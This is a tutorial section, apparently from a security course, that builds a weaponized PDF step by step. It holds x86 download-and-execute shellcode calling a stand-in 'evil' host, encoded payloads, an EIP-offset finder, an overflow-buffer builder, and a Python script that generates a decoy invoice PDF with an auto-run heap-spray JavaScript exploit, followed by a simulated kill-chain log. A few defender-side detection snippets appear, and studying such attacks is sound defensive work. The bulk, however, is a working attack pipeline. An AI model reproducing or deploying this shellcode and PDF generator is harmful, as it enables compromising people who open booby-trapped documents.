// 07 — Exploit Crafting ⏱ 12 min · Advanced

How Attackers Build an Exploit

This section walks through the complete exploit development pipeline — the exact sequence of steps an attacker follows to go from a vulnerability discovery to a fully weaponized PDF that compromises a target system. Each step builds on the previous one: write assembly → assemble to machine code → encode the bytes → craft the overflow buffer → assemble the full payload → embed it inside a PDF structure → test the execution chain.

Understanding this pipeline is critical for defenders because each step creates artifacts that can be detected. Assembly patterns, encoding signatures, heap spray behavior, and suspicious PDF objects all generate signals that security tools can match against. The 7 steps below show exactly what the attacker creates at each stage, what it looks like, and how it works.
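As a concrete example of matching one of those signals, the sketch below counts PDF name tokens that commonly accompany embedded scripts. It is an assumption-laden illustration, loosely in the spirit of keyword-counting triage tools rather than a copy of any of them: the token list and function names are chosen for this example, and it only sees names in the raw file bytes, not names hidden inside compressed object streams.

```python
import re

# Name tokens that triage tools commonly count (list chosen for this example).
SUSPICIOUS_NAMES = (b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch")

def normalize_names(data: bytes) -> bytes:
    """Undo #XX hex escapes, which PDF allows inside names (/J#61vaScript)."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)

def count_suspicious_names(data: bytes) -> dict:
    """Count each token, requiring that the name ends right after it."""
    clean = normalize_names(data)
    counts = {}
    for name in SUSPICIOUS_NAMES:
        pattern = re.escape(name) + rb"(?![A-Za-z0-9])"
        counts[name.decode()] = len(re.findall(pattern, clean))
    return counts

# Hypothetical two-object fragment; the second name is hex-obfuscated.
sample = (b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
          b"3 0 obj << /Type /Action /S /J#61vaScript /JS 4 0 R >> endobj\n")
print(count_suspicious_names(sample))
```

A non-zero count is only a prompt for closer inspection: many legitimate forms use /OpenAction and JavaScript, so a real pipeline would combine this with stream inspection and behavioral analysis.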

⚠ Educational Demonstration Only

The code below is non-functional pseudo-code and simplified illustrations. No working exploit is provided. Real shellcode would need precise offsets, correct API hashes, and a target-specific vulnerability. This exists to help defenders understand attacker methodology so they can build better detections and write accurate YARA rules.

Step 1. Write the Shellcode in Assembly (x86 ASM)

The attacker first writes the payload as raw x86 assembly — the lowest-level human-readable code that maps directly to CPU instructions. This shellcode must be position-independent (it can run from any memory address) and self-contained (it cannot rely on import tables or linker-resolved symbols). The shellcode's job is typically to find the Windows API functions it needs (LoadLibraryA, GetProcAddress, URLDownloadToFileA), then use them to download and execute a second-stage payload from the attacker's server.

Why assembly? The attacker needs the raw machine code bytes — not a compiled executable with headers, sections, and import tables. Shellcode runs in the context of a hijacked process (Adobe Reader in our case), so it must locate system DLLs at runtime by walking the PEB (Process Environment Block), a data structure every Windows process has that contains the list of loaded modules and their base addresses.

shellcode.asm — x86 NASM syntax

; ──────────────────────────────────────────────────
; Shellcode: Download & Execute via URLDownloadToFileA
; Target: Windows x86 (32-bit)
; ──────────────────────────────────────────────────
; HOW THIS WORKS:
; 1. Walk the PEB to find kernel32.dll's base address
; 2. Parse kernel32's export table to find GetProcAddress
; 3. Use GetProcAddress to resolve LoadLibraryA
; 4. Load urlmon.dll using LoadLibraryA
; 5. Resolve URLDownloadToFileA from urlmon.dll
; 6. Call URLDownloadToFileA("http://c2/beacon.exe", "C:\Temp\b.exe")
; 7. Call WinExec("C:\Temp\b.exe") to execute the download
; ──────────────────────────────────────────────────

_start:
    cld                        ; Clear direction flag
    call   find_kernel32       ; Locate kernel32.dll base

find_kernel32:
    xor    eax, eax            ; EAX = 0
    mov    eax, [fs:0x30]      ; EAX = PEB (Process Environment Block)
    mov    eax, [eax+0x0c]     ; EAX = PEB->Ldr
    mov    eax, [eax+0x14]     ; EAX = Ldr->InMemOrderModList
    mov    eax, [eax]          ; Skip first entry (ntdll.dll)
    mov    eax, [eax]          ; Second entry = kernel32.dll
    mov    eax, [eax+0x10]     ; EAX = kernel32 base address

resolve_api:
    ; Walk the Export Address Table to find functions
    mov    ebx, [eax+0x3c]     ; PE header offset
    add    ebx, eax            ; EBX = PE header
    mov    ebx, [ebx+0x78]     ; Export table RVA
    add    ebx, eax            ; EBX = Export table
    ; ... hash-based API resolution continues ...

download_exec:
    ; Call URLDownloadToFileA("http://evil/payload.exe", "C:\\Temp\\a.exe")
    push   0                   ; lpfnCB = NULL
    push   0                   ; dwReserved = 0
    push   esi                 ; szFileName (local path)
    push   edi                 ; szURL (remote URL)
    push   0                   ; pCaller = NULL
    call   [URLDownloadToFileA] ; Download the payload

    ; Execute the downloaded file
    push   esi                 ; lpCommandLine
    call   [WinExec]           ; Run it

Step 2. Assemble to Machine Opcodes (Opcodes)

The assembler (NASM, MASM, or FASM) converts each assembly instruction into its raw byte opcode — the exact bytes the CPU will execute. This is the binary machine code. Each assembly instruction maps to a specific hex sequence defined by the Intel/AMD instruction set architecture. For example, cld (clear direction flag) always assembles to byte FC, and xor eax, eax (set EAX to zero) always assembles to 31 C0.

What the assembler produces: A flat binary file — just raw bytes, no ELF/PE headers, no sections, no imports. This is what makes shellcode different from a normal compiled program. The output is the exact sequence of bytes that will be injected into the exploit buffer and executed directly by the CPU.

assembly → opcodes (objdump output)

;  Address    Opcodes           Assembly Instruction
;  ─────────  ────────────────  ──────────────────────────
   00000000  FC                cld
   00000001  E8 82 00 00 00    call   find_kernel32
   00000006  60                pushad
   00000007  89 E5             mov    ebp, esp
   00000009  31 C0             xor    eax, eax
   0000000B  64 8B 50 30       mov    edx, [fs:eax+0x30] ; PEB (EAX = 0)
   0000000F  8B 52 0C          mov    edx, [edx+0x0c] ; Ldr
   00000012  8B 52 14          mov    edx, [edx+0x14]
   00000015  8B 72 28          mov    esi, [edx+0x28]
   00000018  0F B7 4A 26       movzx  ecx, word [edx+0x26]
   0000001C  31 FF             xor    edi, edi
   0000001E  AC                lodsb
   0000001F  3C 61             cmp    al, 0x61
   ;  ... more instructions ...

; The raw byte sequence (the shellcode) is:
FC E8 82 00 00 00 60 89 E5 31 C0 64 8B 50 30 8B
52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF AC 3C
61 7C 02 2C 20 C1 CF 0D 01 C7 E2 F2 52 57 8B 52
10 8B 4A 3C 8B 4C 11 78 E3 48 01 D1 51 8B 59 20

Step 3. Encode as Hex / URL / Unicode (Encoding)

The raw opcodes from Step 2 must be encoded for delivery inside the exploit vehicle. Different exploit vectors require different encoding formats because the bytes must survive the transport mechanism. A PDF JavaScript payload uses Unicode escapes (%ue8fc) because JavaScript's unescape() function turns each escape into one 16-bit character, whose two bytes in memory are the original byte pair. An RTF exploit uses hex ASCII (fce882) because RTF \objdata fields are parsed as hex digit pairs. Web-based delivery uses URL encoding (%FC%E8) because the receiving side percent-decodes the request.

Why encoding matters: The raw bytes (like 0x00 — a null byte) would break string-based transports. Encoding ensures every byte survives delivery. The exploit code on the receiving end decodes these back to the original raw bytes before executing them.

encoding_formats.txt — same shellcode, different formats

RAW BYTES (the opcodes from Step 2):
FC E8 82 00 00 00 60 89 E5 31 C0 64 8B 50 30 8B

HEX STRING (for Python/C injection):
\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b

URL ENCODED (for web-based delivery):
%FC%E8%82%00%00%00%60%89%E5%31%C0%64%8B%50%30%8B

UNICODE ESCAPE (for JavaScript heap spray):
%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30
  ↑ note: bytes are swapped in pairs (little-endian)
  ↑ FC E8 becomes %ue8fc (E8 first, then FC); 82 00 becomes %u0082

BASE64 (for obfuscation in scripts):
/OiCAAAAYInlMcBki1Awi...

HEX ASCII (for RTF/OLE embedding):
fce8820000006089e531c0648b50308b
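An analyst who meets a %u-escaped string usually wants the reverse direction: turning it back into the byte sequence so it can be compared against the raw listing. The sketch below is a minimal decoder under the pair-swapping rule described above; the function names are invented for this example, and it deliberately ignores everything that is not a well-formed %uXXXX escape.

```python
import re
import struct

def decode_percent_u(text: str) -> bytes:
    """Turn %uXXXX escapes back into bytes.

    Each %uXXXX is one 16-bit code unit; writing it out little-endian
    restores the original byte order (so %ue8fc yields FC E8).
    """
    units = re.findall(r"%u([0-9a-fA-F]{4})", text)
    return b"".join(struct.pack("<H", int(u, 16)) for u in units)

def hex_dump(data: bytes) -> str:
    """Space-separated uppercase hex, matching the listings in this section."""
    return " ".join(f"{b:02X}" for b in data)

print(hex_dump(decode_percent_u("%ue8fc%u0082%u0000%u8960")))
print(decode_percent_u("%u6163%u636c%u652e%u6578"))
```

The first call prints `FC E8 82 00 00 00 60 89`, the first eight raw bytes of the listing, and the second recovers the ASCII text `calc.exe`. Note that the byte pair 82 00 corresponds to the escape %u0082, not %u8200.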

🔄 Try It: Hex Encoder — Build a Payload and See It Inside a PDF

Type any text below and watch it convert live into every hex encoding format attackers use. Below the output, a simulated PDF object view shows exactly how your encoded input would appear embedded inside a real PDF's internal structure — as a compressed JavaScript action stream.

Input (plain text or command)

→

Encoded Output (all formats)

RAW HEX (8 bytes): 63 61 6C 63 2E 65 78 65
C/PYTHON (\x format): \x63\x61\x6c\x63\x2e\x65\x78\x65
URL ENCODED: %63%61%6C%63%2E%65%78%65
UNICODE (%u, little-endian): %u6163%u636c%u652e%u6578
BASE64: Y2FsYy5leGU=
HEX ASCII (for RTF/OLE): 63616c632e657865

📄 Live Preview: How Encoded Data Appears Inside a PDF

This is the PDF object structure an attacker would create. Your input text is encoded with /FlateDecode compression and embedded as a JavaScript action stream. The /OpenAction in the Catalog triggers execution when the file opens.

📄 Generated_Exploit.pdf — live preview Simulated

%PDF-1.7
%âãÏÓ

1 0 obj
<<
  /Type /Catalog
  /Pages 2 0 R
  /OpenAction 3 0 R
>>
endobj

% ... page objects omitted for brevity ...

3 0 obj
<<
  /Type /Action
  /S /JavaScript
  /JS 4 0 R
>>
endobj

4 0 obj
<< /Length 20 /Filter /FlateDecode >>
stream
63 61 6C 63 2E 65 78 65

endstream
endobj

%%EOF

4 objects | 1 action | 8 payload bytes ⚠ SIMULATED

🧪 What This Demonstrates

As you type, the hex bytes update inside Object 4's stream. In a real exploit, these bytes would be zlib-compressed JavaScript containing shellcode and a heap spray. The /OpenAction in Object 1 tells the PDF reader to automatically run the JavaScript in Object 3, which references the payload stream in Object 4. The user opening this PDF would see a normal page; the malicious objects are invisible to the viewer.
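Because the script sits inside a FlateDecode stream, it is invisible to a plain text search but easy to recover for inspection. The sketch below shows one way an analyst might inflate every stream in a file and check the result for strings mentioned in this walkthrough. It is a simplified illustration: the indicator list, the regular expression, and the helper names are assumptions made for this example, and real PDFs can also use other filters, filter chains, and object streams that this does not handle.

```python
import re
import zlib

# Strings taken from the walkthrough; a real rule set would be broader.
INDICATORS = (b"unescape(", b"%u0c0c", b"Collab.collectEmailInfo")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)

def inflate_streams(pdf_bytes: bytes) -> list:
    """Return the inflated body of every stream that zlib can decode."""
    bodies = []
    for match in STREAM_RE.finditer(pdf_bytes):
        try:
            # decompressobj tolerates the newline left before 'endstream'
            bodies.append(zlib.decompressobj().decompress(match.group(1)))
        except zlib.error:
            continue  # not Flate data (or damaged): skip it
    return bodies

def find_indicators(pdf_bytes: bytes) -> list:
    """List which indicator strings appear in any inflated stream."""
    hits = set()
    for body in inflate_streams(pdf_bytes):
        lowered = body.lower()
        hits.update(i.decode() for i in INDICATORS if i.lower() in lowered)
    return sorted(hits)

def make_stream_object(body: bytes) -> bytes:
    """Build a minimal Flate stream object for the demo below."""
    packed = zlib.compress(body)
    return (b"4 0 obj\n<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(packed)
            + packed + b"\nendstream\nendobj\n")

benign = make_stream_object(b"BT /F1 24 Tf (INVOICE) Tj ET")
flagged = make_stream_object(b'var n = unescape("%u0c0c%u0c0c");')
print(find_indicators(benign), find_indicators(flagged))
```

The benign content stream yields an empty list, while the second sample is flagged for `unescape(` and `%u0c0c`. Hits like these justify a closer look rather than a verdict, since legitimate documents also call `unescape`.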

Step 4. Craft the Overflow: Junk + EIP + NOP + Shellcode (Overflow)

This is the core of the exploit. The attacker needs to overflow a buffer so precisely that they overwrite the saved return address: the 4-byte value on the stack that is loaded into EIP (the Extended Instruction Pointer register) when the current function finishes. If the attacker controls that value, they control what code the CPU executes next.

How a buffer overflow works: When a function is called, the CPU pushes the return address onto the stack (this is the value usually labeled "saved EIP"). The function then allocates a local buffer (e.g., 256 bytes for a string). If the function copies more data into this buffer than it can hold (260+ bytes), the extra bytes "overflow" past the buffer's boundary and overwrite whatever is next on the stack: first the saved EBP (base pointer), then the saved EIP (return address). By carefully controlling the overflow, the attacker places a specific address in the saved EIP slot. When the function tries to return, the CPU jumps to the attacker's chosen address instead of the legitimate caller.

Why 0x0C0C0C0C? In a heap spray exploit, the attacker fills hundreds of megabytes of heap memory with NOP-sled + shellcode copies. The address 0x0C0C0C0C (about 193MB into the address space) is very likely to land inside the sprayed region. Overwriting the saved EIP with this address makes the CPU jump into the sprayed heap, where it slides through the sled (0x0C bytes in the JavaScript spray, which execute as the harmless OR AL, 0x0C; 0x90 in a classic NOP sled) until it hits the shellcode.

The Stack Before Overflow

MEMORY (low address → high address)

Stack

Local vars

Buffer[256]

Saved EBP

Saved EIP ↩

Args...

← normal state

The Stack After Overflow (Attacker's Payload)

OVERWRITTEN BY ATTACKER'S INPUT ▼

Stack

AAAA

0C0C

NOP

← JUNK DATA (fills buffer) →

EIP

NOP

SHELLCODE

↳ Junk data ("AAAA..." × 64 = 256 bytes) fills the buffer exactly, and 4 more junk bytes cover the saved EBP (260 bytes in total). The next 4 bytes overwrite the saved EIP with the target address (0x0C0C0C0C). After that, the NOP sled provides a landing zone, followed by the shellcode.

Here's how the attacker determines the exact offset to EIP — they use a cyclic pattern:

finding_eip_offset.py — determine exact overflow point

# Step 1: Generate a unique cyclic pattern
# Every 4-byte sequence is unique, so when the app crashes,
# the value in EIP tells us the exact offset

from struct import pack

# Generate pattern: Aa0Aa1Aa2Aa3Ab0Ab1Ab2...
def cyclic(length):
    pattern = ""
    for upper in "ABCDEFGHIJKLMNOP":
        for lower in "abcdefghijklmnop":
            for digit in "0123456789":
                pattern += upper + lower + digit
                if len(pattern) >= length:
                    return pattern[:length]
    return pattern

# Send this to the vulnerable app
payload = cyclic(500)
# App crashes → debugger shows: EIP = 0x37694136
# Little-endian bytes 36 41 69 37 = "6Ai7", found at offset 260 in the pattern
# → 260 bytes of input come before the saved return address

OFFSET = 260  # exact bytes to reach EIP
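The lookup step ("which offset does this register value correspond to?") is a plain substring search once the register value is converted back to bytes. The sketch below is a self-contained illustration with hypothetical helper names; it uses the full A-Z / a-z / 0-9 alphabet, which produces the same first few hundred characters as the generator above. Offsets are only meaningful when the lookup uses the same pattern scheme that generated the input.

```python
import string
import struct

def cyclic(length: int) -> str:
    """Upper/lower/digit triples: Aa0Aa1Aa2 ... (same scheme as the text)."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if 3 * len(out) >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]

def offset_of(register_value: int, pattern: str) -> int:
    """Find where a crashed 32-bit register value sits in the pattern.

    The register holds four pattern bytes read little-endian, so pack it
    back to bytes before searching. Returns -1 if not present.
    """
    needle = struct.pack("<I", register_value).decode("latin-1")
    return pattern.find(needle)

pattern = cyclic(500)
print(offset_of(0x37694136, pattern))   # bytes "6Ai7"
print(offset_of(0x39624138, pattern))   # bytes "8Ab9"
```

With this scheme the value 0x37694136 ("6Ai7") maps to offset 260, whereas 0x39624138 ("8Ab9") maps to offset 56, so the register value and the quoted offset have to be read as a matched pair.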

Step 5. Assemble the Full Payload (Python)

Now the attacker combines everything from the previous steps into a single binary string — the exploit buffer. This buffer is laid out with surgical precision: exactly 260 bytes of junk (to fill the vulnerable buffer), then exactly 4 bytes that overwrite EIP with the heap spray address, then 64 bytes of NOP sled (a safety margin), then the shellcode itself. Every byte is in the exact right position. If a single byte is off, the exploit crashes the target instead of compromising it.

What this generates: A raw binary payload of ~670 bytes. The junk data fills the buffer; the EIP overwrite redirects execution; the NOP sled absorbs any address imprecision; and the shellcode does the actual work (download + execute a backdoor). This is the data that will be embedded in the PDF's JavaScript heap spray.

build_payload.py — constructing the exploit buffer

import struct

# ── Configuration ──
OFFSET  = 260          # Bytes to reach saved EIP (from Step 4)
EIP_ADDR = 0x0C0C0C0C  # Target: heap spray address
NOP_SIZE = 64          # NOP sled padding (safety margin)

# ── Shellcode (from Step 2, hex-encoded) ──
shellcode = (
    b"\xfc\xe8\x82\x00\x00\x00\x60\x89"  # cld; call; pushad
    b"\xe5\x31\xc0\x64\x8b\x50\x30\x8b"  # PEB walk
    b"\x52\x0c\x8b\x52\x14\x8b\x72\x28"  # Ldr modules
    b"\x0f\xb7\x4a\x26\x31\xff\xac\x3c"  # API resolution
    # ... ~300 more bytes ...
    b"\x57\x69\x6e\x45\x78\x65\x63\x00"  # "WinExec\0"
)

# ── Build the exploit buffer ──
payload  = b"A" * OFFSET                    # ← JUNK (fills buffer)
payload += struct.pack("<I", EIP_ADDR)      # ← EIP overwrite (4 bytes)
payload += b"\x90" * NOP_SIZE               # ← NOP sled (0x90 = NOP)
payload += shellcode                         # ← The actual shellcode

# Visual breakdown:
# [AAAA...AAAA] [0C0C0C0C] [90909090...] [FCE88200...]
#  ← 260 bytes → ← 4 bytes → ← 64 bytes → ← ~342 bytes →
#     JUNK          EIP        NOP SLED     SHELLCODE

print(f"Payload size: {len(payload)} bytes")
print(f"  Junk:      {OFFSET} bytes")
print(f"  EIP:       4 bytes → {hex(EIP_ADDR)}")
print(f"  NOP sled:  {NOP_SIZE} bytes")
print(f"  Shellcode: {len(shellcode)} bytes")
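The sizes and offsets quoted for this layout can be checked independently of any payload bytes. The sketch below only does the bookkeeping: segment lengths are the ones given in the text (with the "~342 bytes" of shellcode taken as exact for the sake of the sum), and the `layout` helper is a name invented for this example.

```python
# Recompute the payload layout from the lengths given in the text.
# Only sizes and offsets are calculated; no payload bytes are built.

SEGMENTS = [                 # (label, length in bytes), in order
    ("junk", 260),
    ("return address", 4),
    ("NOP sled", 64),
    ("shellcode", 342),      # "~342 bytes" in the text, taken as exact here
]

def layout(segments):
    """Return (label, start_offset, end_offset) for each segment."""
    rows, cursor = [], 0
    for label, size in segments:
        rows.append((label, cursor, cursor + size))
        cursor += size
    return rows

rows = layout(SEGMENTS)
for label, start, end in rows:
    print(f"{label:<15} 0x{start:04X} .. 0x{end - 1:04X}  ({end - start} bytes)")
print("total:", rows[-1][2], "bytes")
```

The start offsets come out as 0x0000, 0x0104, 0x0108 and 0x0148, and the total is 670 bytes, which agrees with the "~670 bytes" figure and with a hex dump whose return-address slot sits at offset 0x104.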

Step 6. Inject Payload into a PDF Document (Python, PDF)

The attacker uses Python to construct a malicious PDF from scratch — building each object manually and wiring them together. This is the step where the shellcode from Step 5 gets wrapped inside JavaScript (for heap spray delivery), compressed with zlib (FlateDecode), and embedded as a PDF stream object. The PDF's Catalog object gets a /OpenAction entry pointing to a JavaScript Action object that references the compressed stream. When Adobe Reader opens this file, it follows the chain: Catalog → /OpenAction → JavaScript Action → decompress stream → execute JavaScript → heap spray → trigger vuln → shellcode runs.

What this generates: A PDF file (Invoice_March_2024.pdf) meant to display normal content on screen while the hidden JavaScript runs in the background. The Python below is a simplified illustration, in line with the warning at the top of this section: each PDF object is built as raw bytes and concatenated, but the cross-reference table is abbreviated (no per-object offsets and no startxref), so a strict parser would have to rebuild it before opening the file.

generate_malicious_pdf.py — PDF exploit generator

import zlib
import struct

# ── Convert shellcode to JavaScript unescape format ──
def to_js_unescape(shellcode_bytes):
    """Convert raw bytes to %uXXXX format (little-endian pairs)"""
    js = ""
    for i in range(0, len(shellcode_bytes), 2):
        if i + 1 < len(shellcode_bytes):
            # Swap bytes for little-endian: AB CD → %uCDAB
            js += f"%u{shellcode_bytes[i+1]:02x}{shellcode_bytes[i]:02x}"
        else:
            js += f"%u00{shellcode_bytes[i]:02x}"
    return js

# ── Build the malicious JavaScript ──
sc_js = to_js_unescape(shellcode)
js_code = f"""
var sc = unescape("{sc_js}");

// Heap spray: fill memory with NOP sled + shellcode
var nop = unescape("%u0c0c%u0c0c");
while (nop.length < 0x100000) nop += nop;
var block = nop.substring(0, 0x100000 - sc.length);

var spray = new Array();
for (var i = 0; i < 200; i++) {{
    spray[i] = block + sc;
}}

// Trigger the vulnerability
Collab.collectEmailInfo({{subj: "A".repeat(0x4141)}});
"""

# ── Compress the JavaScript (FlateDecode) ──
js_compressed = zlib.compress(js_code.encode('latin-1'))

# ── Build the PDF structure ──
pdf = b"%PDF-1.7\n"

# Object 1: Catalog with /OpenAction (auto-execute trigger)
pdf += b"1 0 obj\n"
pdf += b"<< /Type /Catalog /Pages 2 0 R"
pdf += b" /OpenAction 4 0 R"                # ← auto-runs on open!
pdf += b" >>\nendobj\n\n"

# Object 2: Pages
pdf += b"2 0 obj\n"
pdf += b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>\n"
pdf += b"endobj\n\n"

# Object 3: Page (shows innocent invoice content)
pdf += b"3 0 obj\n"
pdf += b"<< /Type /Page /Parent 2 0 R"
pdf += b" /MediaBox [0 0 612 792] >>\n"
pdf += b"endobj\n\n"

# Object 4: JavaScript Action (the exploit!)
pdf += b"4 0 obj\n"
pdf += b"<< /Type /Action /S /JavaScript /JS 5 0 R >>\n"
pdf += b"endobj\n\n"

# Object 5: Compressed JavaScript stream (FlateDecode)
pdf += b"5 0 obj\n"
pdf += f"<< /Length {len(js_compressed)}".encode()
pdf += b" /Filter /FlateDecode >>\n"
pdf += b"stream\n"
pdf += js_compressed                           # ← zlib-compressed bytes
pdf += b"\nendstream\nendobj\n\n"

# Write the xref table and trailer
pdf += b"xref\n0 6\n"
pdf += b"trailer << /Size 6 /Root 1 0 R >>\n"
pdf += b"%%EOF"

# ── Save the weaponized PDF ──
with open("Invoice_March_2024.pdf", "wb") as f:
    f.write(pdf)

print("[+] Malicious PDF generated: Invoice_March_2024.pdf")
print(f"[+] JavaScript payload: {len(js_code)} bytes")
print(f"[+] Compressed stream:  {len(js_compressed)} bytes")
print(f"[+] Total PDF size:     {len(pdf)} bytes")

Step 7. Victim Opens the PDF: The Kill Chain (Execution)

This is the moment of truth. The victim double-clicks Invoice_March_2024.pdf in their email. Adobe Reader opens it and displays a normal-looking invoice page. But in the background the exploit chain fires within a second or two. The trace below walks through each stage: parsing the PDF header, traversing the object tree, decompressing and executing JavaScript, spraying the heap, triggering the vulnerability that overwrites EIP, the shellcode walking the PEB to find Windows APIs, and the final download-and-execute of the attacker's backdoor. Each line represents an event in this simulated run; addresses and timings are illustrative.

Why this is hard to detect: Everything happens within the legitimate AcroRd32.exe process. No new .exe is dropped until the very end. The JavaScript runs inside Adobe Reader's embedded SpiderMonkey engine. The heap spray uses normal memory allocation calls. The vulnerability trigger (Collab.collectEmailInfo) is a legitimate PDF API function. Only the final HTTP download and child process spawn create detectable external artifacts.

execution_trace.log — what the CPU sees

──── PDF OPEN ────
[AcroRd32] Parsing %PDF-1.7 header... OK
[AcroRd32] Loading object 1 (Catalog)
[AcroRd32] Found /OpenAction → Object 4
[AcroRd32] Object 4: /Action /JavaScript → Object 5
[AcroRd32] Object 5: FlateDecode stream, decompressing...

──── JAVASCRIPT ENGINE ────
[SpiderMonkey] Executing decoded JavaScript...
[SpiderMonkey] unescape() → 342 bytes of shellcode decoded
[SpiderMonkey] Heap spray: allocating 200 × 1MB blocks...
[SpiderMonkey] Memory at 0x0C0C0C0C: 0C 0C 0C 0C 0C 0C ... ✓

──── VULNERABILITY TRIGGER ────
[SpiderMonkey] Calling Collab.collectEmailInfo()
[AcroRd32] BUFFER OVERFLOW in CollabEmailInfo()
[AcroRd32] Stack:
   ESP: 0x0012F8A0  [41 41 41 41 41 41 41 41]  ← junk
   EBP: 0x41414141  [overwritten with AAAA]     ← junk
   EIP: 0x0C0C0C0C  [overwritten by attacker!]  ← HIJACKED

──── CPU FOLLOWS EIP ────
[CPU] EIP = 0x0C0C0C0C → jumping to heap...
[CPU] Executing: 0C 0C  → OR AL, 0x0C  (harmless NOP)
[CPU] Executing: 0C 0C  → OR AL, 0x0C  (harmless NOP)
[CPU] Executing: 0C 0C  → OR AL, 0x0C  (sliding...)
[CPU] ...sliding through NOP sled...
[CPU] HIT SHELLCODE at 0x0C0D0000
[CPU] FC        → cld
[CPU] E8 82 00  → call find_kernel32
[CPU] 60        → pushad
[CPU] 89 E5     → mov ebp, esp
[CPU] 31 C0     → xor eax, eax
[CPU] 64 8B 50 30 → mov edx, [fs:eax+0x30]  ; PEB
... resolving APIs ... downloading payload ...
[CPU] WinExec("C:\\Temp\\backdoor.exe") → GAME OVER

The Complete Exploit Buffer — Annotated

Here's the final payload laid out byte-by-byte, exactly as it exists in memory when the overflow happens:

OFFSET   HEXADECIMAL BYTES                                 ASCII
0000000  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA  ← JUNK DATA
0000010  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA    (fills buffer)
...      41 41 41 41 ... (× 260 bytes total) ... 41 41 41
0000104  0C 0C 0C 0C                                      ....              ← EIP OVERWRITE!
0000108  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................  ← NOP SLED
0000118  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................    (0x90 = NOP)
...      90 90 90 90 ... (× 64 bytes) ... 90 90 90 90 90                      (landing zone)
0000148  FC E8 82 00 00 00 60 89 E5 31 C0 64 8B 50 30 8B  ......`..1.d.P0.  ← SHELLCODE START
0000158  52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF AC 3C  R..R..r(..J&1..<    (PEB walk)
0000168  61 7C 02 2C 20 C1 CF 0D 01 C7 E2 F2 52 57 8B 52  a|., .......RW.R    (API resolve)
...      ... (~342 bytes of shellcode) ...                                    (download+exec)

🔧 Interactive: Full Pipeline Generator

Watch the complete exploit generation pipeline — from assembly to encoded hex to PDF injection — all in one animated sequence.

[SIMULATED] Full Exploit Development Pipeline
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

>> STEP 1: Writing shellcode assembly...
───────────────────────────────────────
[ASM] _start:
[ASM]   cld
[ASM]   call find_kernel32
[ASM]   xor eax, eax
[ASM]   mov eax, [fs:0x30]   ; PEB
[ASM]   mov eax, [eax+0x0c]  ; Ldr
[ASM]   ... 47 instructions written
[ASM] ✓ shellcode.asm saved (47 instructions)

>> STEP 2: Assembling to opcodes...
───────────────────────────────────
[NASM] nasm -f bin shellcode.asm -o shellcode.bin
[NASM] Assembled: 342 bytes
[NASM] First 16 bytes: FC E8 82 00 00 00 60 89 E5 31 C0 64 8B 50 30 8B
[NASM] ⚠ Null bytes present (0x00), so the bytes must be encoded before string-based delivery
[NASM] ✓ shellcode.bin generated

>> STEP 3: Encoding shellcode...
────────────────────────────────
[ENC] → Python hex:  \xfc\xe8\x82\x00\x00\x00\x60\x89...
[ENC] → URL encoded: %FC%E8%82%00%00%00%60%89%E5%31%C0%64...
[ENC] → JS Unicode:  %ue8fc%u0082%u0000%u8960%u31e5%u64c0...
[ENC] ✓ All 3 formats generated

>> STEP 4: Finding EIP offset...
────────────────────────────────
[FUZZ] Generating cyclic pattern: Aa0Aa1Aa2Aa3Ab0Ab1Ab2...
[FUZZ] Sending 500-byte pattern to vulnerable app...
[FUZZ] App crashed! Analyzing crash dump:
[FUZZ] EIP = 0x37694136 → "6Ai7"
[FUZZ] Pattern offset lookup: 260 bytes
[FUZZ] ✓ EIP offset = 260 bytes

>> STEP 5: Building exploit buffer...
─────────────────────────────────────
[BUILD] Component 1: JUNK = "A" × 260 (fills buffer)
[BUILD] Component 2: EIP  = 0x0C0C0C0C (4 bytes, little-endian: \x0c\x0c\x0c\x0c)
[BUILD] Component 3: NOP  = 0x90 × 64 (NOP sled landing zone)
[BUILD] Component 4: SC   = 342 bytes (shellcode payload)
[BUILD] ─────────────────────────────
[BUILD] Total payload: 670 bytes
[BUILD] Layout: [AAAA...×260][0C0C0C0C][9090...×64][FCE882...]
[BUILD] ✓ Exploit buffer ready

>> STEP 6: Generating malicious PDF...
──────────────────────────────────────
[PDF] Creating %PDF-1.7 header
[PDF] Object 1: /Catalog with /OpenAction → Object 4
[PDF] Object 2: /Pages → 1 page
[PDF] Object 3: /Page → Invoice content (decoy)
[PDF] Object 4: /Action /JavaScript → Object 5
[PDF] Object 5: JavaScript stream (heap spray + trigger)
[PDF]   → Embedding shellcode as unescape("%ue8fc%u0082...")
[PDF]   → Heap spray: 200 × 1MB blocks targeting 0x0C0C0C0C
[PDF]   → Trigger: Collab.collectEmailInfo() overflow
[PDF]   → Compressing with FlateDecode (zlib)...
[PDF]   → JS: 1,847 bytes → compressed: 923 bytes
[PDF] Writing xref table and trailer...
[PDF] ✓ Invoice_March_2024.pdf generated (4,821 bytes)

>> STEP 7: Simulating victim opening PDF...
───────────────────────────────────────────
[00.000s] Adobe Reader launched
[00.012s] Parsing PDF structure... 5 objects loaded
[00.015s] /OpenAction detected → executing JavaScript
[00.018s] JavaScript engine: decoding shellcode (342 bytes)
[00.034s] Heap spray started: block 1/200...
[00.892s] Heap spray complete: 200 MB allocated
[00.893s] Address 0x0C0C0C0C verified → NOP sled present ✓
[00.894s] Triggering Collab.collectEmailInfo()...
[00.895s] ██ BUFFER OVERFLOW ██
[00.895s] EIP overwritten: 0x0C0C0C0C
[00.896s] CPU executing at 0x0C0C0C0C (NOP sled)
